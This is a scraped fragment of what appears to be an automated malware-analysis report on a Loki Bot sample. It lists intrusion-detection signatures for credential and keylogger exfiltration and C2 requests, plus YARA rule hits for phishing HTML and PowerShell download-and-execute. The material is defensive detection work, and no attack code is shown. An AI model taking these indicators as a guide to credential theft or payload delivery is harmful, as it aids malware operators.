Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2 |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||